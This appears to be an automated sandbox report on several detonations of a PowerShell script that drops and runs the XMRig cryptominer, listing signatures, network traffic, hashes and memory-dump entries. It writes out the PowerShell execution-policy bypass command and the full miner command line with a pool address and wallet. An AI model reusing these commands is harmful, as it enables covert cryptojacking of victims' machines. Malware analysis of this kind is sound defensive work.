memory/1228-68-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-69-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-70-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-71-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-72-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-73-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-74-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-75-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-76-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-77-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-78-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-79-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-80-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-81-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-82-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-83-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-84-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-85-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-86-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-87-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-88-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-89-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-90-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-91-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-92-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-93-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-94-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-95-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-96-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-97-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-98-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-99-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-100-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-101-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-102-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-103-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-104-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-105-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-106-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-107-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-108-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-109-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-110-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-111-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-112-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-113-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-114-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-115-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-116-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
NL 23.62.61.152:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 152.61.62.23.in-addr.arpa udp
NL 23.62.61.152:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp

Files

memory/1924-0-0x00007FFA35933000-0x00007FFA35935000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zefpig2b.m3d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1924-10-0x00000239C9CF0000-0x00000239C9D12000-memory.dmp

memory/1924-11-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/1924-12-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/1924-14-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/1924-15-0x00000239C9F80000-0x00000239C9F92000-memory.dmp

memory/1924-16-0x00000239C9F60000-0x00000239C9F6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/808-47-0x0000024375B90000-0x0000024375BB0000-memory.dmp

memory/808-48-0x0000024375BE0000-0x0000024375C00000-memory.dmp

memory/808-49-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-52-0x00000243774D0000-0x00000243774F0000-memory.dmp

memory/808-50-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-51-0x0000024375C00000-0x0000024375C20000-memory.dmp

memory/1924-53-0x00007FFA35933000-0x00007FFA35935000-memory.dmp

memory/1924-54-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/808-55-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/1924-56-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/808-57-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-58-0x0000024375C00000-0x0000024375C20000-memory.dmp

memory/808-59-0x00000243774D0000-0x00000243774F0000-memory.dmp

memory/808-60-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-61-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-62-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-63-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-64-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-65-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-66-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-67-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-68-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-69-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-70-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-71-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-72-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-73-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-74-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-75-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-76-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-77-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-78-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-79-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-80-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-81-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-82-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-83-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-84-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-85-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-86-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-87-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-88-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-89-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-90-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-91-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-92-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-93-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-94-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-95-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-96-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-97-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-98-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-99-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-100-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-101-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-102-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-103-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-104-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-105-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-106-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-107-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-108-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-109-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-110-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-111-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-112-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-113-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-114-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-115-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-116-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-117-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-118-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

memory/1920-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vf3zxnr3.zrg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1920-8-0x0000019432D40000-0x0000019432D62000-memory.dmp

memory/1920-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1920-12-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1920-14-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1920-15-0x0000019433130000-0x0000019433142000-memory.dmp

memory/1920-16-0x0000019432D30000-0x0000019432D3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4012-47-0x0000029D54820000-0x0000029D54840000-memory.dmp

memory/4012-48-0x0000029D54870000-0x0000029D54890000-memory.dmp

memory/4012-49-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-52-0x0000029D54A90000-0x0000029D54AB0000-memory.dmp

memory/4012-50-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-51-0x0000029D54AB0000-0x0000029D54AD0000-memory.dmp

memory/1920-53-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

memory/1920-54-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4012-55-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/1920-56-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4012-57-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-58-0x0000029D54AB0000-0x0000029D54AD0000-memory.dmp

memory/4012-59-0x0000029D54A90000-0x0000029D54AB0000-memory.dmp

memory/4012-60-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-61-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-62-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-63-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-64-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-65-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-66-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-67-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-68-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-69-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-70-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-71-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-72-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-73-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-74-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-75-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-76-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-77-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-78-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-79-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-80-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-81-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-82-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-83-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-84-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-85-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-86-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-87-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-88-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-89-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-90-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-91-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-92-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-93-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-94-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-95-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-96-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-97-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-98-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-99-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-100-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-101-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-102-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-103-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-104-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-105-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-106-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-107-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-108-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-109-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-110-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-111-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-112-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-113-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-114-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-115-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-116-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-117-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-118-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:18

Platform

win11-20240508-en

Max time kernel

1790s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
